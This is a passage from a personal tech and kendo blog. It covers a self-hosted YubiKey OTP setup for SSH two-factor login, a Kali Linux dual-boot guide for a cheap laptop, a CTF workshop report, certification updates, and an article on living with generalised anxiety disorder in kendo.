INSERT INTO yubikeys VALUES (3811938, "vvtblilljglk", "", "783c8d1f1bb5",
"ca21772e39dbecbc2e103fb7a41ee50f", "00000000", "", 1, 1);
COMMIT;

The fields used above are as follows: `serialnr`, `publicname`, `created`, `internalname`, `aeskey`, `lockcode`, `creator`, `active`, `hardware`. The bold fields were pulled from the Personalization Tool, while the other fields were left default or filled with dummy data. (Yes, don’t worry, all of this is NOT my actual security info)

 

Further testing, does the Yubikey work?

Now that both ykval and ykksm are working and now that we’ve registered a key, let’s see if it works! I’ve run the following commands, all of which indicate that my key does in fact work. As before, the OTP was generated by pressing the YK’s sensor.

$ wget -q -O - 'http://localhost/wsapi/decrypt?otp=vvtblilljglkkgccvhnrvtvghjvrtdnlbrugrrihhuje'
OK counter=0001 low=75e6 high=fa use=03

 

$ ykclient --url "http://127.0.0.1/wsapi/2.0/verify" --apikey 6YphetClMU1mKme5FrblQWrFt8c=
     4 vvtblilljglktnvgevbtttevrvnutfejetvdvhrueegc --debug
Input:
validation URL: http://127.0.0.1/wsapi/2.0/verify
client id: 4
token: vvtblilljglktnvgevbtttevrvnutfejetvdvhrueegc
api key: 6YphetClMU1mKme5FrblQWrFt8c=
Verification output (0): Success

 

Making OpenSSH use Yubikey authentication

As I’ve mentioned before, for now I’m opting to use the Yubikey device in a very simple manner: as a second authenticator factor (MFA) for my SSH logins. We will setup PAM and OpenSSH in such a way that any SSH login will first prompt for a Yubikey OTP, after which it will ask for the actual user’s password.

Create /etc/yubikey. This file maps usernames to Yubikey public names, using the following format:

thomas:vvtblilljglk          # username:yubikey-public-name

The great news is that Michal Ludvig has proven that you may also store this information inside LDAP, which means one less file to manage on all your client systems!

Edit /etc/pam.d/sshd and change the AUTH section to include the Yubico PAM module, as follows. Fill in the fully qualified hostname assigned to the ykval web server in the url= parameter.

auth       required    pam_sepermit.so
auth       required   pam_yubico.so mode=client authfile=/etc/yubikey id=5 key=b82PeHfKWVWQxYwpEwHHOmNTO6E= url=http:///wsapi/2.0/verify?id=%d&otp=%s
auth       include      password-auth

Finally edit /etc/ssh/sshd_config and change the following values:

PasswordAuthentication no
ChallengeResponseAuthentication yes

Restart the SSHD and you should be golden!

 

Troubleshooting

When it comes to either ykksm or ykval, full logging is available through Apache. If you've opted to use the default log locations as outlined in the respective installation guides, then you will find the following files:

[root@master apache]# ls -al /var/log/apache
-rw-r--r--   1 root root 15479 Nov 13 21:53 ykval-access.log
-rw-r--r--   1 root root 36567 Nov 13 21:53 ykval-error.log

These will contain most of the useful messages, should either VAL or KSM misbehave.

 

Video: registering a new key and using it

 

 

Sources:

Aside from all the pages I’ve linked to so far, a few other sites stand out as having been tremendously helpful in my quest to get all of this working correctly. Many thanks go out to:


kilala.nl tags: , , ,

View or add comments (curr. 2)

A cheap laptop as pen-testing portable: Lenovo Ideapad s21e-20 and Kali

2015-10-07 15:00:00

the Lenovo Ideapad s21e-20 Windows 8

In preparation for the recent PvIB penetration testing workshop, I was looking for a safe way to participate in the CTF. I was loath to wipe my sole computer, my Macbook Air, and I also didn't want to use my old Macbook, which is now in use as my daughter's plaything. Luckily my IT Gilde buddy Mark Janssen had a great suggestion: the Lenovo Ideapad s21e-20.

Tweakers.net gave it a basic 6,0 out of 10 and I'd agree: it's a very basic laptop at a very affordable price. At €180 it gives me a wonderfully portable system (light and good formfactor), with a decent 11.6" screen, an okay keyboard and too little storage. Storage is the biggest issue for the purposes I had in mind! Biggest annoyance is that the touchpad doesn't work under Linux without lots of fiddling.

I wanted to retain the original Windows 8 installation on the system, while allowing it to dual-boot Kali Linux. Here's the process I followed to get it completely up and running. You will need a bunch of extra hardware along the way.

So here we go!

  1. Unbox and install as usual. Walk through the complete Windows setup.
  2. Feel free to plug the SDHC microSD card into the storage slot of the laptop. You won't be using it for now, but that way you won't lose it. 
  3. Under Windows Update, disable the optional update for the Windows 10 installer. You don't have enough space for Windows 10 anyway. Then run all required updates, to keep things safe.
  4. Configure Windows as desired :)
  5. Using the partitioning and formatting tool of Windows, cut your C: drive by 1.5GB. Create a new partition on the free space created thusly. 
  6. Download the Kali Linux 32-bit live CD.
  7. Get a tool like Rufus and burn the Kali ISO to the external USB drive.
  8. Restart into UEFI, by using the advanced options menu of the Windows restart. Windows key -> Power icon -> shift-click "restart" -> advanced -> UEFI.
  9. In UEFI go to the "boot" tab. Set the boot mode to "Legacy Support", boot priority to "Legacy first" and USB boot to "enabled". 
  10. Save, then plugin the Wifi dongle on the other USB port and reboot. Boot Kali from the USB drive. 
  11. Once you've booted to the desktop, you're stuck without a mouse :p Press the Windows Flag key on your keyboard to pop up the search bar. Type "install" and start the Kali installer. 
  12. The installer starts in a new window, but it will only be partially visible! You'll need to navigate using the arrow keys and you'll need to make a few good guesses. For most questions you can use the default value as provided, or confirm the required information using the Enter key.
  13. If you would like to change your Location, the bottom-most option in the list is "Other" which will allow you to select "Europe" and so on.
  14. Once you reach the "Partition disks" screen, choose "Manual".
  15. Your internal storage is /dev/mmcblk0, while the SDHC card in the slot will be /dev/mmcblk1. Ensure that the 1.5GB partition on blk0 is made into /boot as ext4. Also partition the SDHC card to have at least 20GB of / as ext4 and swap (4GB). If desired you may also create a third partition as FAT32, so you can have more scratch space to exchange files between Windows and Linux. 
  16. The bottom-most option in the partitioning screen is "save and continue". Do not mess with TAB etc. Once you're done with the partition tables, just push the down arrow until it keeps beeping and press Enter.
  17. Once asked where to install GRUB, just chuck it on the /dev/mmcblk0 MBR. This kills the Windows 8 default bootloader, but Windows will work just fine. 
  18. Finish the installation by answering the rest of the questions.
  19. Shutdown the laptop, unplug the USB drive and replace it with your USB mouse. Poweron the laptop and boot Kali.

The good thing is that you won't need to mess around with extra settings to actually boot from the SDHC card! On older Ideapad laptops this was a lot of hassle and required extra work to boot from SD.

Now, we're almost there!

  1. Follow these instructions to allow GRUB to boot Windows again. At the end use the update-grub command instead of grub2-mkconfig. Use fdisk -l /dev/mmcblk0 to find which partition you need to add to 15_Windows. In my case it was hd0,1. That's the EFI partition. You can reboot to verify that Windows boots again. It will complain that "no operating system was found", but Windows will boot just fine!
  2. The guys at blackMORE Ops have created a nice article titled "20 Things to do after installing Kali Linux". A lot of these additions are very nice, feel free to follow them. 
  3. Follow the Debian Wiki instructions on setting up the WL drivers for the BCM43142 onboard wifi card. Reboot afterwards and unplug the USB wifi dongle before starting back into Linux. Your onboard wifi will now work!
  4. If, like me, you appreciate your night vision go ahead and install F.Lux for Linux. In my case I start it up with: xflux -l 52.4 -g 5.3 -k 2600. You can put that in a small script and include it with the startup scripts of Gnome.  

And there we have it! Your Ideapad s21e is now dual-booting Windows 8 and Kali Linux. Don't forget to clone the drives to a backup drive, so you won't have to redo all of these steps every time you visit a hacking event :) Just clone the backup back onto the system afterwards, to wipe your whole system (sans UEFI and USB controllers). 


kilala.nl tags: , , , ,

View or add comments (curr. 0)

PvIB Pen.Testing workshop

2015-10-07 06:32:00

The CTF site

Last night I attended PvIB's annual pen-testing event with a number of friends and colleagues. First impressions? It's time for me to enroll as member of PvIB because their work is well worth it!

In preparation to the event I prepared a minimalistic notebook computer with a Windows 8 and Kali Linux dual-boot. Why Kali? Because it's a light-weight and cross-hardware Linux installer that's chock-full of security tools! Just about anything I might need was pre-installed and anything else was an apt-get away. 

Traveling to the event I expected to do some networking, meeting a lot of new people by doing the rounds a bit while trying to pick up tidbits from the table coaches going around the room. Instead, I found myself engrossed in a wonderfully prepared CTF competition. In this case, we weren't running around the conference hall, trying to capture each other's flags :D The screenshot above shows how things worked:

  1. Each participant would register an account on fragzone.nl
  2. Your personal dashboard showed the available challenges, each worth a number of points.
  3. Supposedly easy challenges would net you 50-100 points, while big ones would net 250, 500 or even 1000!
  4. Each challenge would result in a file or piece of text, which one needed to MD5 and then submit through the dashboard.

I had no illusions of my skillset, so I went into the evening to have fun, to learn and to meet new folks. I completely forgot to network, so instead I hung out with a great group of students from HS Leiden, all of whom ended up really high in the rankings. While I was poking around 50-200 point challenges, they were diving deeply into virtual machine images searching for hidden rootkits and other such hardcore stuff. It was great listening to their banter and their back-and-forth with the table coach, trying to figure out what the heck they were up to :)

I ended up in 49th place out of 85 participants with 625 points. That's solidly middle of the pack; the top 16 scored over 1400 (#1 took 3100!!) and the top 32 scored over 875. 

Challenges that I managed to tackle included:

Together with Cynthia from HSL, we also tried to figure out:

The latter was a wonderful test and we almost had it! We chased various clues from the web, using multiple steganography tools provided by Alan Eliason, as well as ImageMagick and VLC. We assumed it was a motion-JPEG image with differences hidden between the three frames, but that wasn't it. Turns out it -was- in fact steganography, done with steghide.

Ironically the very first test proved very annoying to me, as the MD5 sum of the string I found kept being rejected. It wasn't until our coach hinted at trailing characters (the newline that cat and echo tack onto the end) that I switched from "cat $FILE | md5sum" to "echo -n $STRING | md5sum". And that's what made it work. 
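
If you want to see the difference for yourself, compare the following on any Linux box (the flag string is made up):

  # echo appends a newline, which changes the hash:
  echo 'SomeFlagString' | md5sum
  echo -n 'SomeFlagString' | md5sum
  # The same applies to a file that ends in a newline versus its bare contents:
  cat flag.txt | md5sum
  printf '%s' "$(cat flag.txt)" | md5sum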

To sum things up: was I doing any pen-testing? No. Did I learn new things? Absolutely! Did I have a lot of fun? Damn right! :)


kilala.nl tags: , , , ,

View or add comments (curr. 0)

My first foray into pen-testing

2015-09-30 18:23:00

A few days ago, my buddies at IT Gilde were issued a challenge by the PvIB (Platform voor Informatie Beveiliging), a Dutch platform for IT security professionals. On October 6th, PvIB is holding their annual pen-testing event and they asked us to join in the fun. I've never partaken in anything of the sort and feel that, as long as I keep calling myself "Unix and Security consultant", I really ought to at least get introduced to the basics of the subject :)

So here we go! I'm very much looking forward to an evening full of challenges! 

The PvIB folks warn to not have any sensitive or personal materials on the equipment you'll use during the event, so I went with Mark Janssen's recommendation and bought a cheap Lenovo S21e-20 notebook. I'll probably upgrade that thing to Windows 10 and load it up with a wad of useful tools :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

Some hard work that I need to pull through!

2015-09-30 17:51:00

Aside from my day-to-day activities in the fields of Unix/Linux and security, I want to ensure that I keep up with relevant and useful skills. I believe that expanding my horizons and keeping up with tech outside my usual work is well worth the effort. As the proverbial "big stick" I challenged myself to achieve two professional certifications this year:

  1. Oracle Certified Associate, for Oracle 11. Many of my activities so far have touched on databases, but my current project's the first time that I've had to actually dive into them. I would like to actually know something about the stuff I'm working with, hence I'd like to achieve at least a basic set of Oracle DBA skills. 
  2. Puppet Professional. Puppet's one of the more recent techs that I feel has a huge future. As the saying goes "I want me some of that!". While I have no current need for Puppet, I am keen to soon get started on a Puppet job!

Of course, the year isn't very long anymore, so I'd better get cracking!


kilala.nl tags: ,

View or add comments (curr. 0)

Inadvertent guild master (Wakfu)

2015-07-24 07:55:29

The Damn Snoofles guild

Explanation: this post is about the MMORPG "Wakfu", which Marli and myself played pretty hardcore for about a year in 2013/2014. This post was made on the Wakfu forums before being posted here.

A year onward, I find myself in the surprising position of acting guild master. The prolonged absence of our founding players and Ankama's automatic transfer system led to this new situation. 

Snoofles are NOT an active guild anymore (and whenever Shaleigh finds the time, he can remove the "recruiting" from this topic's title). Rosa and myself will maintain our Haven World as a testament to our group's glory days. 2013 and 2014 were a wonderful time, but they won't return. 

Rosa and I came in at the high point of the guild and met lots of lovely people. I fondly think back to running dungeons and endlessly sh*t-talking with Ama, Disc and Seniv. I remember Bloody and his army of alts, taking us on Luna runs, to grind levels. I remember the rush by the high-ranking players to gather mats and Kama to build up our HW to its current form. And I also remember the drama that finally broke up the team, the ousting of a few members that led to a split in leadership and the heartache that followed. 

That is why we'll be conservators: Damn Snoofles was our home for a year and we loved playing with all of you.


kilala.nl tags: ,

View or add comments (curr. 0)

Puppet Practitioner course completed

2015-06-24 20:03:00

The past few months I've been hearing more and more about Puppet, software that allows for "easy" centralized configuration management for your servers. Monday through Wednesday were spent getting familiar with the basics of the Puppet infrastructure and of how to manage basic configuration settings of your servers. It was an exhausting three days and I've learned a lot!

The course materials assumed that one would make use of the teacher's Puppet master server, while having a practice VM on their own laptop (or on the lab's PC). As I'm usually pretty "balls to the wall" about my studying, I decided that wasn't enough for me :p

Over the course of these three days I've set up a test environment using multiple VMs on my Macbook, running my own Puppet master server, two Linux client systems and a Windows 8 client system. The Windows system provided the most challenges to me as I'm not intimately familiar with the Windows OS. Still, I managed to make all of the exercises work on all three client systems! 

Many thanks to the wonderful Ger Apeldoorn for three awesome days of learning!


kilala.nl tags: , , ,

View or add comments (curr. 0)

First attempt at SQL exam: did not pass

2015-06-19 07:59:00

After roughly three months of studying (at night and on the train) I took a gamble: last night I took my Oracle SQL exam 1Z0-051. Along the way I've learned two things:

  1. The contents of the exam are rather different (and more difficult!) from the practice exams and study materials that came with the two books I have.
  2. It's not a good idea to attempt the online exam at 23:00, after a long day of work and an evening of studying :D

I'm going to "deflate" for a few weeks before continuing my studies. I really, really want to achieve my OCA before the end of the year, so I'd better get a hurry on after that.

But first, my first three days of Puppet training! More exciting new things to learn!


kilala.nl tags: ,

View or add comments (curr. 0)

Branching out, learning about databases

2015-03-01 13:52:00

Since achieving my RHCE last November I've taken things easy: for three months I've done nothing but relaxing and gaming to wind down from the big effort. But now it's time to pick up the slack again!

Over the past years I've worked with many Unix systems and I've also worked with monitoring, deployment and security systems. However, I've never done any work with databases! And that's changed now that I'm in a scrum team that manages an application which runs on Websphere and Oracle. So here I go! I really want to know what I'm working with, instead of just picking up some random terms left and right. 

Starting in March, I'm studying Oracle 11. And to keep myself motivated I've set myself the goal of achieving basic Oracle certification, which in this case comes in the shape of the OCA (Oracle Certified Associate). The certification consists of two exams: a database technology part and an SQL part, the latter of which may be taken online.

This is going to be very challenging for me, as I've never been a good programmer. Learning SQL well enough to write the small programs associated with the exam is going to be exciting but hard :)


kilala.nl tags: ,

View or add comments (curr. 0)

Passed my RHCE

2014-11-11 09:16:00

Snoopy is happy

Huzzah! I passed, with a score of 260 out of 300... That makes it roughly 87%, which is an excellent ending to four months of hard prepwork.

The great thing is that I'm now able to rack up 85 CPE for my CISSP! 25 points in domain A and 60 points in domain B, which means that my CISSP renewal for this year and the next two is basically a shoo-in. Of course, I'll continue my training and studies :)

My RHCE experience was wonderful. Like last year with my RHCSA, I took the Red Hat Kiosk exam in Utrecht.

A while back I was contacted by Red Hat, to inform me that I'm a member of the Red Hat 100 Kiosk Club, which basically means that I'm one of the first hundred people in Europe to have taken a Kiosk exam. As thanks for this, they offered me my next Kiosk exam for free, which was yesterday's RHCE. Nice!

The exam was slated for 10:00, I showed up at 09:30. The reception at BCN in Utrecht was friendly, with free drinks and comfy seats to wait. The Kiosk setup was exactly as before, save the slot for my ID card which was already checked at the door. The keyboard provided was pretty loud, so I'm sorry to the other folks taking their exams in the room :)

All in all I came well prepared, also with thanks to my colleagues for sharing another trial exam with me.


kilala.nl tags: , ,

View or add comments (curr. 0)

Let's do this!

2014-11-09 15:15:00

RHCE exam in 18 hours

If I'm not ready by now, nothing much will help :)

Looking forward to taking the RHCE exam tomorrow and whichever way it goes, I'm also looking forward to the SELinux course I'll be taking at IT Gilde tomorrow night. 


kilala.nl tags: , ,

View or add comments (curr. 0)

RHCE exams, here I come

2014-07-29 21:32:00

Yes, this blog has been quiet for quite a while. In part this is because I've put most of my private stuff behind logins, but also because I've had my professional development on a backburner due to my book translation. 

But now I've started studying for my RHCE certification. A year ago (has it been that long?!) I achieved my RHCSA, which I'll now follow up with the Engineer's degree. Red Hat will still offer the RHEL6 exams until the 19th of December, so I'd better get my ass in gear :)


kilala.nl tags: , ,

View or add comments (curr. 0)

F.Lux on Linux: oh happy day!

2014-07-29 21:27:00

Oh happy day! I've been using F.Lux on my Macs for years now and my eyes thank me for it. This great piece of software will automatically adjust the color temperature of your computer's screen, based on your location and light in your surroundings. 

During the day your screen's white will be white, but in the evenings it'll slowly turn much more orange. During this change you won't even notice it's happening, but the end result is awesome. You'll still be seeing "white" but with much less eyestrain. Even better: supposedly the smaller amount of blue light will help in falling asleep later on. 

Now that I've started studying for my RHCE exams, I'm working extensively on CentOS again. Hellooooo bright light! 

But not anymore. Turns out that xflux is a thing! It's a Linux daemon that quite literally is F.Lux, for Linux. No more burnt out corneas! 


kilala.nl tags: , ,

View or add comments (curr. 0)

Dutch kendo kata book (Nederlandstalig kendo kata boek)

2014-05-21 14:53:00

Historically, the western kendoka has had a tough time finding books and materials to study in his native language. It is only natural that most texts on the subject of kendo and kendo kata are published in the Japanese language.

The Netherlands and Belgium could be considered a very small market for kendo-related books. Thus, the only kendo books in the Dutch language that I am aware of are Louis Vitalis-sensei's book and the translation of Jeff Broderick's book.

 

A Dutch kendo kata book

It is with great pleasure that we announce the publication of a brand new, Dutch kendo book.

"Nihon Kendo no Kata & Kihon Bokuto Waza" is a translation of Stephen Quinlan-sensei's essay on both the traditional kendo kata and on the modern set of waza practices with bokuto. Thomas Sluyter translated the book into the Dutch language, in cooperation with Quinlan-sensei.

 

 

 

Availability

The book is available both in print and as a free ebook.

The original, English version can be obtained here.

 

Contents

The following subjects are covered:

 

About the book

As teachers at the Kingston Kendo Club in Canada, Stephen and Christina Quinlan have written many study materials for their students. One of their largest bodies of work is this particular book, “Nihon Kendo no Kata & Kihon Bokuto Waza“. The book combines literal, technical descriptions of each kata with deep backgrounds on the history, and the philosophy behind the kata. Many books by esteemed teachers were referenced to build this comprehensive body of knowledge.

Thomas Sluyter is a relatively new student of kendo at Renshinjuku Kendo in Amstelveen, the Netherlands. As an avid reader of kendo books, he felt that this particular book should be read by as many Dutch kendoka as possible.


kilala.nl tags: ,

View or add comments (curr. 0)

Living with shikai: generalised anxiety disorder in kendo

2014-03-15 22:01:00

To retain heijoshin (an even mind) is one of the greater goals in kendo.

Heijoshin reflects a calm state of mind, despite disturbing changes around you. [It] is the state of mind one has to strive for, in contrast to shikai, or the 4 states of mind to avoid:

  1. Kyo: surprise, wonder
  2. Ku: fear
  3. Gi: doubt
  4. Waku: confusion, perplexity

(Buyens, 2012)

In the following pages I would like to introduce you to generalized anxiety disorder, hereafter “GAD”. For sufferers of GAD every day is filled with two of these shikai: fear and doubt. While I am but a layman I do hope that my personal experiences will be of use to those dealing with anxiety disorders in the dojo. I will start off by explaining the medical background of GAD, followed by my personal experiences. I will finish the article by providing suggestions to students and teachers dealing with anxiety in the dojo.

 

Anxiety disorders: definition and treatment

All of us are familiar with anxiety and fear as they are basic functions of the human body. You are startled by a loud noise, you jump away from a snapping dog and you feel the pressure exuded by your opponent in shiai. They prepare your body for what is called the “fight or flight” reaction: either you run for your life, or you stand your ground and fight tooth and nail. These instincts become problematic if they emerge without any reasonable stimulus. The most famous type of such a disorder are phobias, the fear of specific objects or situations, which are suggested to occur in ~25% of the adult US population. (Rowney, Hermida, Malone, 2012)

Other types of anxiety disorders are:

For the remainder of this article I will focus on the disorder with which I have personal experience: generalized anxiety disorder.

Perhaps the easiest way to describe GAD is to use an analogy: GAD is to worry, as depression is to "feeling down". Just like a depressed person cannot "simply get over it" and is debilitated in his daily life, so does a person with GAD live with constant worry. As it was described by comic artist Mike Krahulik:

The medication I picked up today said it could cause dizziness. […] I had to obsess over it all afternoon: I drove to work today by myself, will I be able to drive home? What if I can’t? How will I know if I can’t? Should I call the doctor if I get dizzy? How dizzy is too dizzy? What if the doctor isn’t there? Will I need to go to the hospital? Should I get a ride home? I can’t leave my car here overnight. The garage closes at 6 what will I do with my car? What if Kara can’t come get me? Should I ask Kiko for a ride home? If I get dizzy does that mean it’s working? Does that mean it’s not working? What if it doesn’t work?” (Krahulik, 2008)

Paraphrased from DSM-IV-TR (footnote 1) and from Rowney, Hermida, Malone, criteria for GAD are that the person has trouble controlling worries and is anxious about a variety of events, more than 50% of the time, for a duration of at least 6 months. These worries must not be tied to a specific anxiety or phobia and must not be tied to substance abuse. The person exhibits at least three of the following symptoms: restlessness, exhaustion, difficulty concentrating, irritability, muscle tension and sleep disturbance.

Thus the symptoms differ per person, as does the potency of an episode. In severe cases of GAD episodes will result in what is known as a panic attack, which you could describe as a ten-minute bout of super-fear. Effects of a panic attack may include palpitations, cold sweat, spasms and cramps, dizziness, confusion, aggressiveness and hyperventilation. Because of these effects, people having a panic attack may think they are having a heart attack or that they are going plain crazy.

An important element to GAD is the vicious cycle or snowball effect. As my therapy workbook describes it (Boeijen, 2007), a sense of anxiety will lead to physical and mental expressions, which in turn will lead to anxious thinking. People with GAD will often fear the effects of anxiety, like fainting or throwing up. These anxious thoughts will create new anxiety, which may worsen the experienced effects, which in turn will feed more anxious thoughts. And so on. Thus, even the smallest worry could start an episode of anxiety, like a snowball rolling down a slope. What may get started with “The fish I had for lunch tasted a bit off.” may end up with “Oh no, I’m having a heart attack!“. If that doesn’t sound logical to you, you’re right! The vicious cycle feeds off of assumptions, worries and thoughts that get strung together. I’ll have two personal examples later.

Treatment of GAD occurs in different ways, often combined:

All sources agree that having proper support structures is imperative for those suffering from any anxiety disorder. Knowing that people understand what you are going through provides a base level of confidence, a foothold if you will. Knowing that these people will be able to catch you if you fall is a big comfort. Having someone to help you dispel illogical and runaway worries is invaluable.

 

My personal experiences with GAD

I am lucky that I suffer from mild GAD and that I have only experienced fewer than fifteen panic attacks in my life. Where others are harrowed by constant anxiety, I only have trouble in certain situations. I was never diagnosed as such, but in retrospect I have had GAD since my early childhood. At the time, the various symptoms were classified as "school sickness", irritable bowel syndrome and work-related stress. It was only during a holiday abroad in 2010 that I realized something bigger was at hand, because I had a huge panic attack. I was extremely agitated, could not form a coherent train of thought and was very argumentative. My conclusion at the time was that "I'm going crazy here, that has to be it. I really don't want this, I need a pill to take this away right now!". Oddly, I discounted the whole thing when we arrived home. It took a second, big panic attack for me to accept that I needed to talk to a professional.

This second panic attack progressed as follows:

(Sluyter, 2011)

This illustrates the aforementioned vicious cycle: an innocuous thought (“I wonder how my daughter is doing.“) leads to me worrying that I’m ill, which leads to me worrying about my errand, which gives me stomach cramps, which reinforces my fears about being ill, which makes me nauseous and dizzy, and so on. Worries express themselves, which creates anxiety, which in turn reinforces the earlier worries. It didn’t take my doctor long to refer me to a therapist for Cognitive Behavior Therapy, hereafter “CBT”.

CBT is one of many forms of therapy applicable to anxiety disorders and it is often cited as the most effective one. It is suggested (Rowney, Hermida, Malone, 2012) that CBT achieves “a 78% response rate in panic disorder patients who have committed to 12 to 15 weeks of therapy“. In my personal opinion CBT is successful because it is based on empowerment: the patient is educated about his disorder, showing him that it does not have actual power over him and how he can deal with it. As part of therapy, one learns to recognize the patterns that are involved in the disorder and how to pause or halt these cycles. Patients are given tools to prevent episodes, or to relax during an attack. CBT also relies upon the notion of ‘exposure’ wherein the patient is continuously challenged to overstep his own boundaries. The senses of self-worth and of confidence are improved by realizing that your world isn’t as small as you let your fears make it.

I have learned that the best way to deal with a runaway snowball of thoughts is to dispel the thoughts the moment they occur. Anxious thoughts often start out small and then spiral into nonsensical and unreasonable worries. By tackling each question when it comes, I maintain a feeling of control. Having someone with me to talk over all these worries is very useful, because they are an objective party: they can answer my questions from a grounded perspective. My wife has proven to be indispensable, simply by talking me down from the nonsense in my head.

I first started kendo in January of 2011, half a year before I started CBT. In the week leading up to class I devoured online resources, just so I wouldn’t make a fool of myself. In my mind I had this image that I would be under constant scrutiny as ‘the new guy’. I feared that any misstep would make my integration into the group a lot harder. I read up on basic class structures, on etiquette, on basic terminology and I even did my best to learn a few Japanese phrases in order to thank sensei for his hospitality. Even before taking a single class I already had a mental image of kendo as very strict, disciplined and unforgiving and I was making assumptions and having worries left and right.

I have now practiced kendo for little over two years and I have found that it is a great tool in conquering my anxiety disorder.

  1. I experience kendo as a physically tough activity. Seeing myself break through my limitations forces me to reassess what I am and am not capable of.
  2. The discipline in class feels like a solid wall holding me up and there is a sense of camaraderie. My sempai and sensei will not let me fail and I have a responsibility towards them to tough it out.
  3. Reading and learning about kendo provides me with confidence that I may one day grow into a sempai role.
  4. In kendo one aims for kigurai. As Geoff Salmon-sensei once wrote: “kigurai can mean confidence, grace, the ability to dominate your opponent through strength of character. Kigurai can also be seen as fearlessness or a high level of internal energy. What it is not, is posturing, self congratulating or show-boating“. (Salmon, 2009) Thus kigurai is a very empowering concept!
  5. Kendo is such an engaging activity that it grabs my full attention. Once we have started I no longer have time to worry about anything outside of the dojo. Or as one sempai says: “At tournaments I’m panicking all the way to the shiaijo, but once shiai starts I’m in the zone.

In the dojo I may forget about the outside world, but there are many reasons for anxiety in the training hall as well. For example, after a particularly heavy training I will feel nauseous and lightheaded, which has led to fears of fainting and hyperventilation. I have also worried about sensei’s expectations regarding my performance and attendance to tournaments (“What if I can’t attend? What will he say? Will he reproach me? Will he think less of me?“).

I have also felt anxious about training at our dojo’s main hall, simply because their level is so much higher than mine. I felt that I was imposing on them, that I was burdening them with my bad kendo and that I was making a fool of myself. I finally broke through this by exposure: by attending a national level training and sparring with 7-dan teachers I learned that a huge difference in skill levels is nothing to be ashamed of. All of a sudden I felt equal to my sempai, not as a kendoka but as a human being.

Another great example of exposure was a little trick pulled by the sensei of our main dojo who is aware of my GAD. He had noticed that I allow myself to bow out early if I start to get anxious. So what does he do? We started class using mawari geiko (where the whole group rotates to switch partners) and right before it’s my turn to move to the kakarite side he freezes the group’s rotation. So now I’m stuck in a position where I have responsibility towards my sempai, because without me in this spot the opposing kakarite would need to skip a round of practice! On the one hand I was starting to get anxious from physical exhaustion, but on the other hand I would not allow myself to stop because of this sense of responsibility. His trick worked and I pulled through with stronger confidence.

In the dojo I regularly use two of the tools taught to me during CBT (Boeijen, 2007):

 

GAD in the dojo, for teachers

If one of your students approaches you about their anxiety disorder, please take them seriously. As I explained at the beginning of this article we all feel fear and have doubts, but an actual disorder is another kettle of fish. You will not be expected to be their therapist or their caretaker; all they need is your support. Simply knowing that you’ve got their back is a tremendous help to them!

In issue #5.2 of “Kendo World” magazine, Ben Sheppard in his article “Teaching kendo to children” (Sheppard, 2010) discusses the concept of duty of care. While the legal aspects of the article pertain to minors in certain countries, the general concept can be applied to any student who may require special care. It would be prudent to have some file containing relevant medical and emergency information. This should not be a medical file by any means, but having a list of known risks as well as emergency contact information would be a good idea.

Please realize that you are helping your student cope with their anxieties simply by teaching him kendo. Brad Binder offers (Binder, 2007) that most studies agree that the regular participation in a martial art “cultivates decreases in hostility, anger, and feeling vulnerable to attack. They also lead to more easygoing and warmhearted individuals and increases in self-confidence, self-esteem and self-control.” This may in part be due to the fact that “Asian martial arts have traditionally emphasized self-knowledge, self-improvement, and self-control. Unlike Western sports, Asian martial arts usually: teach self-defense, involve philosophical and ethical teachings to be applied to life, have a high degree of ceremony and ritual, emphasize the integration of mind and body, and have a meditative component.

Should a student indicate that they are having a panic attack, take them aside. Remove them from class, but don't leave them alone. Have them sit down on the floor and against a wall to prevent injuries should they faint. Guide them through a breathing exercise, as described in the previous paragraph. Reassure them that they are safe and that, while it feels scary, they will be just fine. Help them dispel illogical anxious thoughts. Funny kendo stories are always great as backup material.

Finally, I would suggest that you keep on challenging these students. Continued exposure, by drawing them outside of their comfort zone, will hopefully help them extend beyond their limitations. Having responsibilities and being physically exhausted can lead to anxiety in these people, but being exposed to them in a supportive environment can also be therapeutic.

 

GAD in the dojo, for students

If you have GAD, or another anxiety disorder, I think you should first and foremost extend your support structure into the dojo. Inform your sensei of your issues because he has a need to know. As was discussed in an earlier issue (“Kendo World” #5.2, Sheppard, 2010), dojo staff needs to be aware of medical conditions of their students, for the students’ safety. If there’s a chance of you hyperventilating, fainting or having a panic attack during class, they really need to know.

If you are on medication for your anxieties, please also inform your sensei. They don’t necessarily have to know which medication it is, but they need to be made aware of possible side effects. They should also be able to inform emergency personnel if something ever happens to you.

If you feel comfortable enough to do so, confide in at least one sempai about your anxieties. They don’t have to know everything about it, but talking about your thoughts and worries can help you calm down and put things into perspective. They can also take you aside during class if need be, so the rest of class can proceed undisturbed and so you won’t feel like the center of attention.

Being prepared can give you a lot of peace of mind. I bring a first aid kit with me to the dojo that includes a bag to breathe into (for hyperventilation) and some dextrose tablets. I also look up information about the dojo and tournament venues I will be visiting, to know about amenities, locations and such.

If you aren’t already in therapy, I would sincerely suggest CBT. CBT can help you understand your anxiety disorder and it can provide you with numerous tools to cope. Anxiety is not something you’re easily cured of, but by having the right skills under your belt you can definitely make life a lot easier for yourself!

And let me just say: kudos to you! You’ve already faced your anxieties and crossed your own boundaries by joining a kendo dojo! The toughest, loudest and smelliest martial art I know!

 

Footnotes and references

1: DSM-IV-TR is Diagnostic and Statistical Manual of Mental Disorders, 4th edition, text revision. A document published by the American Psychiatric Association that attempts to standardize the documentation and classification of mental disorders.

 

Binder, B. (1999, 2007) "Psychosocial Benefits of the Martial Arts: Myth or Reality?"

Boeijen, C. van (2007) “Begeleide Zelfhulp – overwinnen van angstklachten”

Budden, P. (2007) “Buteyko and kendo: my personal experience, 2007”

Buyens, G. (2012) “Glossary related to BUDO and KOBUDO”

Krahulik, M. (2008) “Dear Diary”

Rowney, Hermida, Malone (2012) “Anxiety disorders”

Salmon, G. (2009) “Kigurai”

Sheppard, B. (2010) "Teaching kendo to children" – Appeared in Kendo World 5.2

Sluyter, T. (2011) “Dissection of a panic attack”


This article appeared before in Kendo World magazine, vol 6-4, 2013 (eBook and print version on Amazon). The article is republished here with permission of the publisher.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Etiquette reminders

2014-03-13 22:00:00

The past few weeks, we have been paying extra attention to kendo etiquette.  As they say: “Rei ni hajimari, rei ni owari” (kendo begins with rei and ends with rei); without etiquette we might as well just whack each other with sticks.

There are many books and articles available on kendo etiquette and one can talk for hours about it. For now, these are some of the things that we have been reminded of recently.


kilala.nl tags: , ,

View or add comments (curr. 0)

Info on the knee injury

2013-10-19 19:37:00

